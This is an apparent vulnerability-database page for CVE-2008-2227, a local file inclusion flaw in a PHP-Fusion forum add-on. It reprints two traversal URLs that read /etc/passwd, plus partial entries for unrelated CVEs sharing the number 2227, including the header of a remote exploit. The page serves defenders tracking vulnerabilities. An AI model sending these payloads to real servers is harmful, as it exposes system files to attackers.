CVE-2008-2227
published 2008-05-14CVE-2008-2227: Multiple directory traversal vulnerabilities in PHP-Fusion Forum Rank System 6 allow remote attackers to include and execute arbitrary local files via a .…
PriorityP432medium6.8CVSS 2.0
AVNACMAuNCPIPAP
EXPLOIT
EPSS
1.85%
76.5th percentile
Multiple directory traversal vulnerabilities in PHP-Fusion Forum Rank System 6 allow remote attackers to include and execute arbitrary local files via a .. (dot dot) in the settings[locale] parameter to (1) forum.php and (2) profile.php in infusions/rank_system/. NOTE: the provenance of this information is unknown; the details are obtained solely from third party information.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| php-fusion | forum_rank_system | — | — |
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
Bopup Communications Server 3.2.26.5460 - Remote SYSTEM
exploitdb·2009-06-22
CVE-2009-2227 Bopup Communications Server 3.2.26.5460 - Remote SYSTEM
Bopup Communications Server 3.2.26.5460 - Remote SYSTEM
---
/* bopup-down.c
*
* Copyright (c) 2008 by
*
* Bopup Communications Server remote SYSTEM exploit
* by mu-b - Sat Feb 08 2008
*
* - Tested on: Bopup Communications Server 3.2.26.5460 (Mar 18 2009)
*
* .text:00407A17 lea eax, [ebp+pkt_0x19]
* .text:00407A1D push eax
* .text:00407A1E lea eax, [ebp+var_354]
* .text:00407A24 push eax
* .text:00407A25 call _strcpy
*
* note: this is updated over time for newer versions, I can't be bothered
* making it universal nor anything else...
*
* - Private Source Code -DO NOT DISTRIBUTE -
* http://www.digit-labs.org/ -- Digit-Labs 2008!@$!
*/
#include
#include
#include
#include
#include
#include
#include
#define BUF_SIZE 2048
#define BOPUP_STR_OFFSET 0x19
#define BOPUP_STR_LEN 0x348+8
#define
Exploit-DB
Forum Rank System 6 - 'settings['locale']' Multiple Local File Inclusions
exploitdb·2008-05-07
CVE-2008-2227 Forum Rank System 6 - 'settings['locale']' Multiple Local File Inclusions
Forum Rank System 6 - 'settings['locale']' Multiple Local File Inclusions
---
source: https://www.securityfocus.com/bid/29077/info
Forum Rank System is prone to local file-include vulnerabilities because it fails to properly sanitize user-supplied input.
An attacker can exploit these vulnerabilities using directory-traversal strings to view files local scripts in the context of the webserver process. This may aid in further attacks.
Forum Rank System 6 is vulnerable; other versions may also be affected.
http://www.example.com/infusions/rank_system/forum.php?settings[locale]=../../../../../../../../etc/passwd%00
http://www.example.com/infusions/rank_system/profile.php?settings[locale]=../../../../../../../../etc/passwd%00
Nuclei
Modoboa < 2.1.0 - Improper Authorization
nuclei·CVSS 9.1
CVE-2023-2227 [CRITICAL] Modoboa < 2.1.0 - Improper Authorization
Modoboa < 2.1.0 - Improper Authorization
Improper Authorization in GitHub repository modoboa/modoboa prior to 2.1.0.
Template:
id: CVE-2023-2227
info:
name: Modoboa < 2.1.0 - Improper Authorization
author: ritikchaddha,princechaddha
severity: critical
description: |
Improper Authorization in GitHub repository modoboa/modoboa prior to 2.1.0.
impact: |
Unauthenticated attackers can access sensitive configuration parameters including default passwords and authentication settings through the API endpoint, potentially compromising the entire email management system.
remediation: |
Update Modoboa to version 2.1.0 or later that implements proper authorization checks for the parameters API endpoint.
reference:
- https://huntr.com/bounties/351f9055-2008-4af0-b820-01ff66678bf3
- https://github.c
No writeups or analysis indexed.
http://secunia.com/advisories/30304http://www.securityfocus.com/bid/29077http://www.securityfocus.com/bid/29077/exploithttps://exchange.xforce.ibmcloud.com/vulnerabilities/42244http://secunia.com/advisories/30304http://www.securityfocus.com/bid/29077http://www.securityfocus.com/bid/29077/exploithttps://exchange.xforce.ibmcloud.com/vulnerabilities/42244
2008-05-14
Published